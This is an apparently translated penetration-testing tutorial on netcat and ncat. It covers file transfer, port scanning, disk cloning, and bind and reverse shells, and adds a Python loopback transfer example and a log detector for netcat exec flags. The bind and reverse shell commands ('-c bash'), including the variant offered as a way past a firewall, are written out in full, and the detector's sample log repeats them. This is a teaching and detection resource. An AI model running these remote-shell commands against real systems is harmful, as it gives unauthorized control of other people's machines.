What is Netcat?
Netcat is a full-featured networking utility which reads and writes data across network connections using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
(From the GNU Netcat official homepage.)
Help information (nc -h):
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -C                      Send CRLF as line-ending
        -z                      zero-I/O mode [used for scanning]
A: Server IP 192.168.192.144
B: Client IP 192.168.192.100
1. Normal port connection
nc -nv 192.168.192.144 80    # connect to port 80 on server A
Direct communication:
Server A: nc -l -p 333    # open port 333 and listen on it
Client B: nc -nv 192.168.192.144 333
2. Transferring text messages
Server A: nc -l -p 333
Client B: ls -l | nc -nv 192.168.192.144 333    # the directory listing is displayed on A
Server A: nc -l -p 333 > message.txt
Client B: ps aux | grep ssh | nc -nv 192.168.192.144 333 -q 1    # send the ssh process list to A
3. Transferring files
Server A: nc -l -p 333 > from_bclient.mp4    # receiving side
Client B: nc -nv 192.168.192.144 333 < my.mp4 -q 1    # sending side
-q 1: quit 1 second after EOF on stdin, i.e. after the end of the file has been sent
Server A: nc -l -p 333 < a.mp4 -q 1    # sending side
Client B: nc -nv 192.168.192.144 333 > from_a.mp4    # receiving side
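The transfers in sections 2 and 3 all rely on the same TCP stream model: the receiver reads until the sender closes the connection, and -q is what makes the sender close it once stdin hits EOF. The following added example (not part of the original post) reproduces both ends on the loopback interface in Python, using an ephemeral port and a constructed 1 MiB payload instead of my.mp4, and adds the check netcat itself never performs: a SHA-256 comparison of what was sent against what was received.

```python
import hashlib
import socket
import threading


def receive_until_eof(listener):
    # Receiver, like `nc -l -p 333 > from_bclient.mp4`: accept one peer and
    # read until that peer closes its side of the connection (EOF).
    conn, _peer = listener.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(65536)
            if not data:  # b"" means the sender shut down its write side
                break
            chunks.append(data)
    return b"".join(chunks)


def send_and_quit(host, port, payload, quit_delay=1.0):
    # Sender, like `nc -nv HOST 333 < my.mp4 -q 1`: stream the bytes, then
    # shut down the write side so the receiver sees EOF. Without this step
    # (the role of -q) the receiver keeps waiting and never finishes the file.
    with socket.create_connection((host, port)) as sock:
        sock.sendall(payload)
        sock.shutdown(socket.SHUT_WR)
        sock.settimeout(quit_delay)  # -q N: linger at most N seconds for a reply
        try:
            while sock.recv(4096):
                pass
        except socket.timeout:
            pass
    return hashlib.sha256(payload).hexdigest()


def transfer_over_loopback(payload):
    # Run both ends on 127.0.0.1 with an ephemeral port and return what the
    # receiver got together with both sides' SHA-256 digests. Netcat has no
    # integrity check of its own, so this comparison is the step a practitioner
    # adds after the transfer (sha256sum on both hosts does the same job).
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}
    receiver = threading.Thread(
        target=lambda: result.update(data=receive_until_eof(listener)))
    receiver.start()
    sent_digest = send_and_quit("127.0.0.1", port, payload)
    receiver.join()
    listener.close()
    received = result["data"]
    return {
        "received": received,
        "sent_sha256": sent_digest,
        "received_sha256": hashlib.sha256(received).hexdigest(),
    }


if __name__ == "__main__":
    sample = bytes(range(256)) * 4096  # constructed 1 MiB stand-in for my.mp4
    out = transfer_over_loopback(sample)
    print(len(out["received"]), out["sent_sha256"] == out["received_sha256"])
```

The shutdown(SHUT_WR) call is the programmatic equivalent of the EOF that -q reacts to; if you drop it, the receiver's recv() loop never sees b"" and the "transfer" hangs exactly the way a netcat session without -q does.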
4. Transfer Directory
A: tar -cvf - notebooks/ | nc -l -p 333 -q 1    # pack the directory and serve it on port 333
B: nc -nv 192.168.192.144 333 | tar -xvf -    # receive and unpack it
5. Transferring encrypted files
A: nc -l -p 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > fromb.mp4    # receive and decrypt (-d)
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < my.mp4 | nc -nv 192.168.192.144 333 -q 1    # encrypt and send
Note that -m ecb encrypts every block independently, so repeated plaintext blocks remain visible in the ciphertext; a chained mode such as cbc is the safer choice, and the mcrypt passphrase must still be shared out of band.
6. Streaming Media Services
A: cat a.mp4 | nc -l -p 333    # streaming server
B: nc -nv 192.168.192.144 333 | mplayer -vo x11 -cache 3000 -
MPlayer: command-line media player
7. Port Scan
nc -nvz 192.168.190.144 1-1024    # scan ports 1-1024 of A; TCP ports are scanned by default
nc -nvzu 192.168.190.144 1-1024    # scan UDP ports
8. Remote hard disk/memory clone
A: nc -l -p 333 | dd of=/dev/sda    # write the received image to A's disk
B: dd if=/dev/sda | nc -nv 192.168.192.144 333 -q 1    # stream B's disk to A
9. Remote CONTROL
B controls A:
A: nc -l -p 333 -c bash
B: nc 192.168.192.144 333
Note:
If A's firewall blocks all inbound ports, B cannot control A by connecting to a port on A. Instead B listens on port 333 and A actively connects out to B:
B controls A:
A: nc 192.168.192.100 333 -c bash
B: nc -l -p 333
nc has no encryption and no authentication, so everything it transmits travels in plaintext. ncat (from the Nmap project) addresses this. Its help output (ncat --help):
Usage: ncat [options] [hostname] [port]

Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
  -4                         Use IPv4 only
  -6                         Use IPv6 only
  -U, --unixsock             Use Unix domain sockets only
  -C, --crlf                 Use CRLF for EOL sequence
  -c, --sh-exec <command>    Executes the given command via /bin/sh
  -e, --exec <command>       Executes the given command
      --lua-exec <filename>  Executes the given Lua script
  -g hop1[,hop2,...]         Loose source routing hop points (8 max)
  -G <n>                     Loose source routing hop pointer (4, 8, 12, ...)
  -m, --max-conns <n>        Maximum <n> simultaneous connections
  -h, --help                 Display this help screen
  -d, --delay <time>         Wait between read/writes
  -o, --output <filename>    Dump session data to a file
  -x, --hex-dump <filename>  Dump session data as hex to a file
  -i, --idle-timeout <time>  Idle read/write timeout
  -p, --source-port port     Specify source port to use
  -s, --source addr          Specify source address to use (doesn't affect -l)
  -l, --listen               Bind and listen for incoming connections
  -k, --keep-open            Accept multiple connections in listen mode
  -n, --nodns                Do not resolve hostnames via DNS
  -t, --telnet               Answer Telnet negotiations
  -u, --udp                  Use UDP instead of default TCP
      --sctp                 Use SCTP instead of default TCP
  -v, --verbose              Set verbosity level (can be used several times)
  -w, --wait <time>          Connect timeout
  -z                         Zero-I/O mode, report connection status only
      --append-output        Append rather than clobber specified output files
      --send-only            Only send data, ignoring received; quit on EOF
      --recv-only            Only receive data, never send anything
      --allow                Allow only given hosts to connect to Ncat
      --allowfile            A file of hosts allowed to connect to Ncat
      --deny                 Deny given hosts from connecting to Ncat
      --denyfile             A file of hosts denied from connecting to Ncat
      --broker               Enable Ncat's connection brokering mode
      --chat                 Start a simple Ncat chat server
      --proxy <addr[:port]>  Specify address of host to proxy through
      --proxy-type <type>    Specify proxy type ("http" or "socks4" or "socks5")
      --proxy-auth <auth>    Authenticate with HTTP or SOCKS proxy server
      --ssl                  Connect or listen with SSL
      --ssl-cert             Specify SSL certificate file (PEM) for listening
      --ssl-key              Specify SSL private key (PEM) for listening
      --ssl-verify           Verify trust and domain name of certificates
      --ssl-trustfile        PEM file containing trusted SSL certificates
      --ssl-ciphers          Cipherlist containing SSL ciphers to use
      --ssl-alpn             ALPN protocol list to use.
      --version              Display Ncat's version information and exit
A:
ncat -c bash --allow 192.168.192.100 -vnl 333 --ssl    # only 192.168.192.100 may connect; the session is SSL-encrypted (with no --ssl-cert, ncat generates a temporary self-signed certificate)
B:
ncat -nv 192.168.192.144 333 --ssl    # encrypted, but without --ssl-verify/--ssl-trustfile the client does not check the server's certificate
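The nc -h text marks -c and -e "[dangerous!!]", and the ncat help adds --exec, --sh-exec and --lua-exec to that family; any of them hands an incoming or outgoing connection to a program, which is exactly what the "Remote control" section above builds on. From the defender's side the same flags are what a process-execution monitor should look for. The following is an added example, not code from the original post: it classifies netcat/ncat command lines from a constructed, simplified exec log (the `ts host= user= cmd=""` format is an assumption made for the example, not any real tool's output), distinguishes a listening exec (bind) from an outbound one (reverse, the firewall-evading variant), and records whether ncat's --ssl was in use.

```python
import re
import shlex

# Binaries and the options that hand the connection to a program. nc -h itself
# marks -c/-e "[dangerous!!]"; ncat adds the long forms --exec/--sh-exec/--lua-exec.
NETCAT_BINARIES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
LONG_EXEC_FLAGS = {"--exec", "--sh-exec", "--lua-exec"}

# Constructed process-execution log lines (not from any real host). The commands
# are the ones used on this page plus one long-option variant.
SAMPLE_LOG = """\
2018-04-23T10:00:01 host=A user=root cmd="nc -lp 333 -c bash"
2018-04-23T10:00:05 host=B user=bob cmd="nc -nv 192.168.192.144 333 < my.mp4 -q 1"
2018-04-23T10:00:09 host=A user=root cmd="nc 192.168.192.100 333 -c bash"
2018-04-23T10:00:12 host=B user=bob cmd="ncat -nv 192.168.192.144 333 --ssl"
2018-04-23T10:00:15 host=A user=root cmd="ncat -c bash --allow 192.168.192.100 -vnl 333 --ssl"
2018-04-23T10:00:20 host=B user=bob cmd="/usr/bin/ncat --sh-exec /bin/sh -l 4444"
"""

# Assumed log line layout for this example: timestamp, host=, user=, cmd="...".
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')


def classify(cmd):
    """Return None for netcat use that only moves data, or a dict describing an
    invocation that executes a program on connect."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: not parseable as a command line
        return None
    if not argv:
        return None
    binary = argv[0].rsplit("/", 1)[-1]
    if binary not in NETCAT_BINARIES:
        return None
    listening = tls = False
    exec_flag = None
    for tok in argv[1:]:
        if tok.startswith("--"):
            if tok in LONG_EXEC_FLAGS:
                exec_flag = tok
            elif tok == "--listen":
                listening = True
            elif tok == "--ssl":
                tls = True
        elif tok.startswith("-") and len(tok) > 1:
            # Combined short options such as -lp, -vnl or -nvz are walked per
            # letter. Case matters: -c/-e execute, while -C (CRLF) does not.
            letters = tok[1:]
            if "l" in letters:
                listening = True
            for ch in "ce":
                if ch in letters:
                    exec_flag = "-" + ch
    if exec_flag is None:
        return None
    return {
        "binary": binary,
        "flag": exec_flag,
        # Listening + exec is a bind shell; connecting out + exec is the
        # reverse variant used when the target's inbound ports are blocked.
        "direction": "bind" if listening else "reverse",
        "tls": tls,
    }


def scan_log(text):
    """Run classify() over every parseable log line and return the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        verdict = classify(m["cmd"])
        if verdict:
            findings.append({**m.groupdict(), **verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["host"], f["user"], f["direction"], f["flag"],
              "ssl" if f["tls"] else "plaintext", "|", f["cmd"])
```

The rule flags four of the six constructed lines: the two bind shells and one reverse shell from the nc section plus the --sh-exec listener, while the plain file transfer and the --ssl client without an exec option pass. The tls field is reported rather than used to suppress a finding, since encrypting a bind shell does not make it less worth investigating.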
Please credit the source when reposting.
Posted on 2018-04-23
Kali penetration test 1 - netcat